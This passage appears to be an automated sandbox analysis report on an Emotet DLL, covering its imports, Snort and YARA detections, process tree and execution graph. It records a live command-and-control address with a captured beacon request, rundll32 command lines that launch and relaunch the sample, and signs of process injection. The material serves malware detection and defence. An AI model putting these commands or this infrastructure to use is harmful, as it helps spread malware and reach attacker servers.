                                                                                                      RT_GROUP_CURSOR0xa5a640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a780x14dataEnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a8c0x14dataEnglishUnited States
                                                                                                      RT_MANIFEST0xa5aa00x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                      Imports

DLL | Import
KERNEL32.dll | RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, Sleep, GetStdHandle, GetACP, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, RtlUnwind, GetStringTypeW, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, LCMapStringA, LCMapStringW, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, GetProcessHeap, GetCommandLineA, GetDateFormatA, GetTimeFormatA, GetSystemTimeAsFileTime, HeapReAlloc, VirtualQuery, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapAlloc, HeapFree, GetCurrentDirectoryA, GetShortPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetProfileIntA, GetOEMCP, GetCPInfo, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetThreadLocale, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetFileSize, CreateFileA, CloseHandle, SystemTimeToFileTime, LocalFileTimeToFileTime, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToSystemTime, GetModuleFileNameA, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, LocalAlloc, LocalLock, LocalUnlock, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, lstrcmpA, InterlockedIncrement, GetCurrentProcessId, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, GlobalAlloc, FormatMessageA, LocalFree, FreeLibrary, InterlockedDecrement, GlobalFree, FreeResource, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, SetLastError, GetTickCount, MulDiv, lstrcpynA, LoadLibraryA, ExitProcess, GetVersion, CompareStringA, LockResource, lstrcmpiA, GetLastError, InterlockedExchange, GetStringTypeExA, lstrlenW, MultiByteToWideChar, CompareStringW, SizeofResource, WideCharToMultiByte, LoadResource, lstrlenA, FindResourceA, GlobalMemoryStatus, GetStringTypeA
USER32.dll | SetCapture, GetDCEx, FindWindowA, SetWindowRgn, DestroyIcon, LockWindowUpdate, ShowOwnedPopups, PostQuitMessage, LoadCursorA, DestroyCursor, GetTabbedTextExtentA, MessageBeep, IsClipboardFormatAvailable, RedrawWindow, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, SetParent, WindowFromDC, InSendMessage, ClipCursor, GetCursorPos, PostThreadMessageA, CreateMenu, CopyAcceleratorTableA, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, SetCursor, ReleaseCapture, InsertMenuItemA, CreatePopupMenu, SetMenu, TranslateAcceleratorA, InvalidateRect, SetRectEmpty, ShowWindow, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, DeleteMenu, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, PostMessageA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, CopyRect, GetScrollInfo, SetScrollInfo, PtInRect, SetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindow, GetMenuStringA, AppendMenuA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, UnhookWindowsHookEx, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, IsWindow, GetWindowLongA, EnableWindow, GetSystemMetrics, SetRect, LoadAcceleratorsA, GetDlgItem, IsWindowEnabled, GetNextDlgTabItem, EndDialog, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, ScreenToClient, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetMenuItemBitmaps, WindowFromPoint, GetMenuItemInfoA, UnregisterClassA, GetSysColorBrush, RegisterClipboardFormatA, GetMessageA, TranslateMessage, BeginDeferWindowPos, ValidateRect, GetClientRect, DrawIcon, wsprintfA, CharUpperA, LoadIconA, FillRect, MessageBoxA, IsZoomed, SendMessageA, IsWindowVisible, IsRectEmpty, InflateRect, UpdateWindow, SetWindowTextA, SetWindowPos, ReleaseDC, CreateWindowExA, BringWindowToTop, SetWindowLongA, GetDC, GetParent, GetFocus, KillTimer, GetWindowRect, SetTimer, DestroyWindow, IsIconic, CheckMenuItem, EnableMenuItem, GetMenuState, ModifyMenuA, LoadBitmapA, GetMenuCheckMarkDimensions
GDI32.dll | SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, DeleteDC, CreatePatternBrush, CreatePen, CreateSolidBrush, CopyMetaFileA, CreateDCA, GetCharWidthA, CreateFontA, StretchDIBits, SetBrushOrgEx, CreateMetaFileA, SetWindowOrgEx, DeleteMetaFile, GetTextExtentPoint32A, DPtoLP, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, GetViewportOrgEx, GetBkColor, UnrealizeObject, GetTextAlign, GetWindowOrgEx, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextFaceA, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, CloseMetaFile, GetStockObject, GetViewportExtEx, CreateRectRgn, SelectClipRgn, DeleteObject, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, CreateBitmap, GetDeviceCaps, CreateFontIndirectA, GetObjectA, GetTextMetricsA, StretchBlt, CreateCompatibleDC, CreateCompatibleBitmap, Rectangle, GetWindowExtEx
comdlg32.dll | GetFileTitleA
WINSPOOL.DRV | GetJobA, DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll | RegQueryValueA, RegEnumKeyA, GetFileSecurityA, SetFileSecurityA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegSetValueA, RegCloseKey, RegCreateKeyA
SHELL32.dll | DragFinish, DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragAcceptFiles
SHLWAPI.dll | PathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll |
ole32.dll | OleIsCurrentClipboard, OleFlushClipboard, CoRegisterClassObject, CoRevokeClassObject, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, OleLockRunning, CoRegisterMessageFilter, OleSetClipboard, CreateFileMoniker, StgCreateDocfile, CoDisconnectObject, CreateGenericComposite, CreateItemMoniker, CreateStreamOnHGlobal, OleSaveToStream, WriteClassStm, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CreateDataAdviseHolder, OleRegGetMiscStatus, CreateOleAdviseHolder, OleRegEnumVerbs, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, IsAccelerator, OleTranslateAccelerator, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CreateBindCtx, StringFromCLSID, OleRegGetUserType, WriteClassStg, CoTaskMemFree, CoLockObjectExternal, OleRun, GetRunningObjectTable, OleIsRunning, StgIsStorageFile, StgOpenStorage
OLEAUT32.dll | SysStringLen, SysStringByteLen, VariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString

                                                                                                      Exports

Name | Ordinal | Address
Control_RunDLL | 1 | 0x10003680

                                                                                                      Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/01/21-16:12:03.931139 | TCP | 2404336 | ET CNC Feodo Tracker Reported CnC Server TCP group 19 | 49775 | 443 | 192.168.2.4 | 51.178.61.60

                                                                                                      TCP Packets


                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 51.178.61.60

                                                                                                      HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49775 | 51.178.61.60 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-12-01 15:12:04 UTC | 0 | OUT | GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1
                                                                                                      Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIw
                                                                                                      Host: 51.178.61.60
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
2021-12-01 15:12:05 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Wed, 01 Dec 2021 15:12:05 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close


                                                                                                      Code Manipulations

                                                                                                      System Behavior

                                                                                                      General

Start time: 16:11:53
Start date: 01/12/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
Imagebase: 0xd30000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:55
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:56
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:12:16
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:12:32
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:12:43
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:11.9%
                                                                                                        Total number of Nodes:529
                                                                                                        Total number of Limit Nodes:13

                                                                                                        Graph

113 API calls 3 library calls 20885->21008 21006 10040732 VirtualFree HeapFree HeapFree HeapDestroy 20888->21006 20889 1003d131 20890 1003d145 20889->20890 21009 100488ac 112 API calls 6 library calls 20889->21009 20896 1003d14a 20890->20896 21011 10048860 70 API calls ___init_ctype 20890->21011 20893 1003d13a 20893->20890 21010 1003feb7 76 API calls 3 library calls 20893->21010 20894 1003d15a 20894->20884 20896->20855 21094 10003b20 20897->21094 20899 100033be 20900 10003b20 ___DllMainCRTStartup 70 API calls 20899->20900 20901 100033e1 20900->20901 21106 10003e70 20901->21106 20903 100033fd LoadLibraryA 20904 10003417 MessageBoxA ExitProcess 20903->20904 20905 10003430 ___DllMainCRTStartup 20903->20905 20906 10003574 VirtualAllocExNuma 20905->20906 20907 10003588 20905->20907 20908 10003597 WriteProcessMemory 20906->20908 20907->20908 21113 1003a230 20908->21113 20910 100035b7 21132 10002d70 20910->21132 20912 100035bf ___DllMainCRTStartup 21135 100028f0 20912->21135 20914 100035d0 ___DllMainCRTStartup 21145 10039f21 20914->21145 20916 10003670 20916->20838 20916->20841 20918 100406f8 20917->20918 20919 100406fb 20917->20919 20918->20862 21033 1004067d 69 API calls 3 library calls 20919->21033 20921 10040700 20922 1004072e 20921->20922 20923 1004070a 20921->20923 20922->20862 21034 1004094d HeapAlloc 20923->21034 20925 10040714 20925->20922 20926 10040719 HeapDestroy 20925->20926 20926->20918 20928 10045c67 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20927->20928 20929 10045c5e 20927->20929 20933 10045cb1 TlsAlloc 20928->20933 21035 10045936 6 API calls __decode_pointer 20929->21035 20934 10045cff TlsSetValue 20933->20934 20935 10045dcb 20933->20935 20934->20935 20936 10045d10 20934->20936 20935->20869 21036 10040037 5 API calls 3 library calls 20936->21036 20938 10045d15 21037 10045834 TlsGetValue 20938->21037 20941 10045834 __encode_pointer 5 API calls 20942 10045d30 20941->20942 20943 10045834 __encode_pointer 5 API calls 20942->20943 20944 
10045d40 20943->20944 20945 10045834 __encode_pointer 5 API calls 20944->20945 20946 10045d50 20945->20946 21046 100407a6 69 API calls ___crtInitCritSecAndSpinCount 20946->21046 20948 10045d5d 20949 10045dc6 20948->20949 20951 100458a0 __decode_pointer 5 API calls 20948->20951 21048 10045936 6 API calls __decode_pointer 20949->21048 20952 10045d71 20951->20952 20952->20949 20953 10041721 __calloc_crt 69 API calls 20952->20953 20954 10045d8a 20953->20954 20954->20949 20955 100458a0 __decode_pointer 5 API calls 20954->20955 20956 10045da4 20955->20956 20956->20949 20957 10045dab 20956->20957 21047 10045973 69 API calls 4 library calls 20957->21047 20959 10045db3 GetCurrentThreadId 20959->20935 20961 10048bf4 GetEnvironmentStringsW 20960->20961 20962 10048c13 20960->20962 20963 10048bfc 20961->20963 20964 10048c08 GetLastError 20961->20964 20962->20963 20965 10048cae 20962->20965 20967 10048c3d WideCharToMultiByte 20963->20967 20968 10048c2e GetEnvironmentStringsW 20963->20968 20964->20962 20966 10048cb6 GetEnvironmentStrings 20965->20966 20969 1003d117 20965->20969 20966->20969 20970 10048cc6 20966->20970 20973 10048c71 20967->20973 20974 10048ca3 FreeEnvironmentStringsW 20967->20974 20968->20967 20968->20969 20986 10048620 20969->20986 21051 100416e1 69 API calls _malloc 20970->21051 21049 100416e1 69 API calls _malloc 20973->21049 20974->20969 20977 10048cdf 20979 10048ce6 FreeEnvironmentStringsA 20977->20979 20980 10048cf2 ___init_ctype 20977->20980 20978 10048c77 20978->20974 20981 10048c80 WideCharToMultiByte 20978->20981 20979->20969 20984 10048cfa FreeEnvironmentStringsA 20980->20984 20982 10048c91 20981->20982 20983 10048c9a 20981->20983 21050 10039f30 69 API calls 7 library calls 20982->21050 20983->20974 20984->20969 21052 1003f350 20986->21052 20988 1004862c GetStartupInfoA 20989 10041721 __calloc_crt 69 API calls 20988->20989 20995 1004864d 20989->20995 20990 10048857 __calloc_impl 20990->20883 20991 100487d4 GetStdHandle 20997 1004879e 20991->20997 20992 
10041721 __calloc_crt 69 API calls 20992->20995 20993 10048839 SetHandleCount 20993->20990 20994 100487e6 GetFileType 20994->20997 20995->20990 20995->20992 20996 10048721 20995->20996 20995->20997 20996->20997 20999 10048755 20996->20999 21000 1004874a GetFileType 20996->21000 20997->20991 20997->20993 20997->20994 20998 100487fd 20997->20998 20998->20990 20998->20997 21054 1004aa03 69 API calls 5 library calls 20998->21054 20999->20990 20999->20996 21053 1004aa03 69 API calls 5 library calls 20999->21053 21000->20996 21000->20999 21055 1003ff49 21003->21055 21005 10040033 21005->20853 21006->20855 21008->20889 21009->20893 21010->20890 21011->20894 21012->20865 21014->20860 21018 10041725 21015->21018 21017 1003d1ad 21017->20855 21021 100458a0 TlsGetValue 21017->21021 21018->21017 21019 10041745 Sleep 21018->21019 21075 10039fbe 21018->21075 21020 1004175a 21019->21020 21020->21017 21020->21018 21022 100458d4 GetModuleHandleA 21021->21022 21023 100458b3 21021->21023 21025 100458e3 GetProcAddress 21022->21025 21026 1003d1cb 21022->21026 21023->21022 21024 100458bd TlsGetValue 21023->21024 21028 100458c8 21024->21028 21027 100458cc 21025->21027 21026->20875 21026->20876 21027->21026 21029 100458f3 RtlDecodePointer 21027->21029 21028->21022 21028->21027 21029->21026 21030->20881 21031->20855 21032->20855 21033->20921 21034->20925 21036->20938 21038 10045847 21037->21038 21039 10045868 GetModuleHandleA 21037->21039 21038->21039 21040 10045851 TlsGetValue 21038->21040 21041 10045877 GetProcAddress 21039->21041 21042 10045891 21039->21042 21043 1004585c 21040->21043 21045 10045860 21041->21045 21042->20941 21043->21039 21043->21045 21044 10045887 RtlEncodePointer 21044->21042 21045->21042 21045->21044 21046->20948 21047->20959 21049->20978 21050->20983 21051->20977 21052->20988 21053->20999 21054->20998 